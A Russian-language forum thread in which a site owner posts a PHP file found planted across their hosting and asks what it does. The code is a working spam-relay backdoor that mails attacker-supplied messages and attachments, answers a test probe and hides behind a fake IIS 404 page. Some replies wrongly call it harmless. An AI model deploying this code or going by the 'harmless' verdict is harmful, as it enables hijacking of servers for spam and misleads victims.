[X] Помощник

[Robot-sgibatel Topic Starter]

Во всех public_html моего хостинга появился файл d3er56son2g.php с таким содержанием:

<?


function XdtdYAoi($xctmp, $from, $to, $subj, $text, $filename) {
    $f         = fopen($filename,"rb");
    $un        = strtoupper(uniqid(time()));
    $head      = "From: $from\n";
    $head     .= "To: $to\n";
    $head     .= "Reply-To: $from\n";
    $head     .= "Subject: $subj\n";
    $head     .= "Content-Type:multipart/mixed;";
    $head     .= "boundary=\"----------".$un."\"\n\n";
    $zag       = "------------".$un."\nContent-Type:text/html;\n";
    $zag      .= "Content-Transfer-Encoding: 8bit\n\n$text\n\n";
    $zag      .= "------------".$un."\n";
    $zag      .= "Content-Type: application/octet-stream;";
    $zag      .= "name=\"".basename($filename)."\"\n";
    $zag      .= "Content-Transfer-Encoding:base64\n";
    $zag      .= "Content-Disposition:attachment;";
    $zag      .= "filename=\"".basename($filename)."\"\n\n";
    $zag      .= chunk_split(base64_encode(fread($f,filesize($filename))))."\n";

    return @mail("$to", "$subj", $zag, $head);
}

function BJerCRmc($xctmp,$from,$to,$subj,$text) {
    $head      = "From: $from\n";
    $head     .= "To: $to\n";    
    $head     .= "Subject: $subj\n";
    $head     .= "Reply-To: $from\n";
    $head     .= "Content-type: text/html; charset=windows-1251" . "\r\n";
    return @mail($to,$subj,$text,$head);
}

if (!empty($_POST['caption']) && !empty($_POST['email']) && !empty($_POST['clientname']) && !empty($_POST['emailsend']) && !empty($_POST['message']) && ($_POST['index'] == 'send'))
{

  $xclient = substr(htmlspecialchars(trim($_POST['clientname'])), 0, 80);
  $title = substr(htmlspecialchars(trim($_POST['caption'])), 0, 80);
  $mess64 = base64_decode($_POST['message']);
  $mess =  substr(trim($mess64), 0, 10000000);
  $send_to = $_POST['emailsend'];    
  $from = $_POST['email'];
  
  if($_FILES['file']['name'] !=''){
    if (is_dir("tmp")) { } else { mkdir("tmp"); }
    if(is_uploaded_file($_FILES['file']['tmp_name']))   {
    if(move_uploaded_file($_FILES['file']['tmp_name'], "tmp/".basename($_FILES['file']['name']))) {
    if(XdtdYAoi($xclient,$from,$send_to,$title,$mess,"tmp/".basename($_FILES['file']['name']))!== FALSE) { echo "OK-FILE"; } else { echo "ERROR-FILE"; }
    @unlink("tmp/".basename($_FILES['file']['name']));
    } else { echo "ERROR-UPLOAD"; }
    } else { echo "ERROR-MOVE"; }
  } else {
             if(BJerCRmc($xclient,$from,$send_to,$title,$mess) !== FALSE) {
           echo "OK-MESS"; } else { echo "ERROR-MESS"; }
       }
}
else
{
if ($_GET['index'] == 'test') {echo "OK2009"; exit;} else
{
echo '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
  BODY { font: 8pt/12pt verdana }
  H1 { font: 13pt/15pt verdana }
  H2 { font: 8pt/12pt verdana }
  A:link { color: red }
  A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="java script:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>';}

}  
  
?>

Кто-нибудь может хоть примерно сказать что это такое, я заметил что с его появлением на одном сайте что-то испортилось, что именно - не смог понять, а на другом сайте пропал хтацесс.

[НЕПЛОХОЙ]

а почему бы не спросить у хостера?

[Robot-sgibatel Topic Starter]

У меня хостер с "не очень отзывчивой тех поддержкой". Я бы сказал точнее, но материться на форуме вроде как нельзя...

Скажите хоть примерно, что там за функции? Я в пхп полный ноль

[НЕПЛОХОЙ]

где то есть форма, там поля примерно такие:

Тема письма
Ваш e-mail (т.е. куда отправляется письмо)
Сообщение
Прикрепленый файл

А этот код обработчик этой формы. Т.е. он отправляет данные на почту тому кто заполнил форму.
Ничего такого вредоносного я в этом скрипте не заметил.

Хотя странно как то нафига он нужен...

[ZiTosS]

Bender, мне кажется хостер что-то проверяет, только зачем? Такое чувство хотят проверить отправку формы.
Вот что мне только не нравится

    if(move_uploaded_file($_FILES['file']['tmp_name'], "tmp/".basename($_FILES['file']['name']))) {
    if(XdtdYAoi($xclient,$from,$send_to,$title,$mess,"tmp/".basename($_FILES['file']['name']))!== FALSE) { echo "OK-FILE"; } else { echo "ERROR-FILE"; }
    @unlink("tmp/".basename($_FILES['file']['name']));

Происходит загрузка документа в каталог tmp, а затем его стирают, но может быть такое, что закинут, а прав на удаление не будет. Вообще можно удалённо через этот скрипт сдать через вас почту. Зачем они это сделали не знаю.

Замечание модератора: Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней. Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой или обратитесь к любому из модераторов.